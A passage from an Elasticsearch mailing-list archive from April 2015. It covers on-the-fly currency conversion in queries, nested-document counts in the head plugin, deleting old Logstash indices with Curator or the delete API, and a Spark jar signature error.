_source.provider_price )",
  "params": {
"rates": {
  "USD": 1,
  "AUD": 0.75,
  ...
  ...
  ...
}
  }
}
  },
  "sort": [
{
  "_score": "desc"
}
  ]
}


A few queries with the above:

  1) Does this generally seem like a sane implementation?

  2) These both work perfectly for doing on-the-fly conversions of currency 
and returning it with the documents, but at the moment my app-side code 
has to make the distinction between price-sorting queries and term 
queries and issue the correct one, as well as extract the converted 
price from the correct field depending on the query (_score or 
_source.user_price respectively).

  Is there any way to simplify this?

  e.g. When doing a function_score query, copy the _score to another 
generated field called "user_score". 
  That way the code only needs to know about one field ("user_score") 
for both queries.
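
One possible simplification (an untested sketch, not taken from the docs): attach the same script_fields block to the function_score request as well, so both query shapes return the converted price under fields.user_price and the app code always reads that one field regardless of sort mode:

```json
{
  "query": { "function_score": { ... } },
  "script_fields": {
    "user_price": {
      "script": "( rates[_source.provider_currency] * _source.provider_price )",
      "params": { "rates": { "USD": 1, "AUD": 0.75 } }
    }
  },
  "sort": [ { "_score": "asc" } ]
}
```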

Cheers for any assistance the community can provide.

David.



Head shows incorrect docs count if nested type field is defined in mapping

2015-04-16 Thread Xudong You
I was confused by the docs count displayed in the head plugin when there is 
a nested type field defined in the mapping.

For example, I created a new index with following mapping:
{
  "mappings": {
    "doc": {
      "properties": {
        "QueryClicks": {
          "type": "nested",
          "properties": {
            "Count": { "type": "long" },
            "Term": { "type": "string" }
          }
        },
        "Title": { "type": "string" }
      }
    }
  }
}

And then insert ONE doc:
{
  "QueryClicks":[{"Term":"term1","Count":10},{"Term":"term2","Count":10}],
  "Title":"test title"
}

Then refresh Head; the docs count shown on Head is 3:
size: 3.57ki (6.97ki)
docs: 3 (3)

Why?



Re: Deleted index directories but can still see logs through Kibana

2015-04-16 Thread Ch Ravikishore
Hi,
I am new to Linux. I have Python 2.4.3 installed on my machine, and the pip 
installation is throwing an error. Could you help me install and configure 
Curator?
Thanks

On Thursday, April 16, 2015 at 1:01:30 PM UTC+5:30, Mark Walkom wrote:
>
> Elasticsearch Curator (https://github.com/elasticsearch/curator) is a 
> better way to manage deletion of indices.
>
> Deleting them off the file system is messy.
>
> On 16 April 2015 at 16:50, Ch Ravikishore  > wrote:
>
>> Hi,
>>
>> I deleted the index directories from */data/Cluster/nodes/0/indices
>> But still I am able to access logs from the Kibana dashboard. I don't 
>> know where I went wrong. Please suggest how to delete 7-day-old indices.
>> index directory name format :
>> logstash-2015.04.02
>>
>> Thanks in advance,
>> Regards,
>> Ravi
>>
>>
>
>



Re: Deleted index directories but can still access logs through Kibana

2015-04-16 Thread Mark Walkom
Elasticsearch Curator (https://github.com/elasticsearch/curator) is a
better way to manage deletion of indices.

Deleting them off the file system is messy.
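For reference, if Curator won't install on an old Python, the same 7-day cleanup can be scripted against the delete-index API directly. A hedged sketch (the function name is mine; the prefix and date format match the index names above; written for a modern Python, not 2.4):

```python
import datetime

def indices_older_than(names, days, today, prefix="logstash-", fmt="%Y.%m.%d"):
    """Pick out index names whose date suffix is more than `days` days old."""
    cutoff = today - datetime.timedelta(days=days)
    old = []
    for name in names:
        if not name.startswith(prefix):
            continue  # ignore indices that are not daily logstash indices
        stamp = datetime.datetime.strptime(name[len(prefix):], fmt).date()
        if stamp < cutoff:
            old.append(name)
    return old

names = ["logstash-2015.04.02", "logstash-2015.04.15", "logstash-2015.04.16"]
print(indices_older_than(names, 7, datetime.date(2015, 4, 16)))
# ['logstash-2015.04.02']
```

Each selected index is then removed through the API (e.g. `curl -XDELETE 'http://localhost:9200/logstash-2015.04.02'`), which keeps the cluster state consistent, unlike removing directories from disk.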

On 16 April 2015 at 16:50, Ch Ravikishore wrote:

> Hi,
>
> I deleted the index directories from /data/Cluster/nodes/0/indices,
> but I am still able to access logs from the Kibana dashboard. I don't know
> where I went wrong. Please suggest how to delete 7-day-old indices.
> index directory name format :
> logstash-2015.04.02
>
> Thanks in advance,
> Regards,
> Ravi
>



Re: about elasticsearch-hadoop error

2015-04-16 Thread Costin Leau
Based on your cryptic message, my guess is that the jar you are building is incorrect: its 
manifest is invalid. The Spark jars are most likely signed, and the extra content breaks signature verification.


See 
http://www.elastic.co/guide/en/elasticsearch/hadoop/master/troubleshooting.html#help
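One common workaround, assuming the cause really is stale signature entries from a signed dependency merged into the uber-jar (the function name is mine), is to rebuild the jar without the META-INF signature files:

```python
import zipfile

def strip_signatures(src_jar, dst_jar):
    # Copy a jar while dropping META-INF signature entries (*.SF, *.DSA,
    # *.RSA). Once unrelated classes are merged into a signed archive these
    # entries no longer match the contents, which produces the
    # "Invalid signature file digest for Manifest main attributes"
    # SecurityException shown above.
    with zipfile.ZipFile(src_jar) as src, \
         zipfile.ZipFile(dst_jar, "w", zipfile.ZIP_DEFLATED) as dst:
        for info in src.infolist():
            name = info.filename
            suffix = name.rsplit(".", 1)[-1]
            if name.startswith("META-INF/") and suffix in ("SF", "DSA", "RSA"):
                continue  # stale signature entry; skip it
            dst.writestr(info, src.read(name))
```

The cleaner long-term fix is to exclude those entries at build time (for example, a filter in the shade/assembly plugin) rather than patching the artifact afterwards.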

On 4/16/15 9:11 AM, guoyiqi...@gmail.com wrote:

Hello,

When I add the elasticsearch-hadoop jar, I get this error:

Spark assembly has been built with Hive, including Datanucleus jars on classpath
Exception in thread "main" java.lang.SecurityException: Invalid signature file 
digest for Manifest main attributes
at 
sun.security.util.SignatureFileVerifier.processImpl(SignatureFileVerifier.java:287)
at 
sun.security.util.SignatureFileVerifier.process(SignatureFileVerifier.java:240)
at java.util.jar.JarVerifier.processEntry(JarVerifier.java:274)
at java.util.jar.JarVerifier.update(JarVerifier.java:228)
at java.util.jar.JarFile.initializeVerifier(JarFile.java:348)
at java.util.jar.JarFile.getInputStream(JarFile.java:415)
at sun.misc.JarIndex.getJarIndex(JarIndex.java:137)
at sun.misc.URLClassPath$JarLoader$1.run(URLClassPath.java:674)
at sun.misc.URLClassPath$JarLoader$1.run(URLClassPath.java:666)
at java.security.AccessController.doPrivileged(Native Method)
at sun.misc.URLClassPath$JarLoader.ensureOpen(URLClassPath.java:665)
at sun.misc.URLClassPath$JarLoader.<init>(URLClassPath.java:638)
at sun.misc.URLClassPath$3.run(URLClassPath.java:366)
at sun.misc.URLClassPath$3.run(URLClassPath.java:356)
at java.security.AccessController.doPrivileged(Native Method)
at sun.misc.URLClassPath.getLoader(URLClassPath.java:355)
at sun.misc.URLClassPath.getLoader(URLClassPath.java:332)
at sun.misc.URLClassPath.getResource(URLClassPath.java:198)
at java.net.URLClassLoader$1.run(URLClassLoader.java:358)
at java.net.URLClassLoader$1.run(URLClassLoader.java:355)
at java.security.AccessController.doPrivileged(Native Method)
at java.net.URLClassLoader.findClass(URLClassLoader.java:354)
at java.lang.ClassLoader.loadClass(ClassLoader.java:425)
at java.lang.ClassLoader.loadClass(ClassLoader.java:358)
at java.lang.Class.forName0(Native Method)
at java.lang.Class.forName(Class.java:270)
at 
org.apache.spark.deploy.SparkSubmit$.org$apache$spark$deploy$SparkSubmit$$runMain(SparkSubmit.scala:538)
at org.apache.spark.deploy.SparkSubmit$.doRunMain$1(SparkSubmit.scala:166)
at org.apache.spark.deploy.SparkSubmit$.submit(SparkSubmit.scala:189)
at org.apache.spark.deploy.SparkSubmit$.main(SparkSubmit.scala:110)
at org.apache.spark.deploy.SparkSubmit.main(SparkSubmit.scala)



thank you



--
Costin
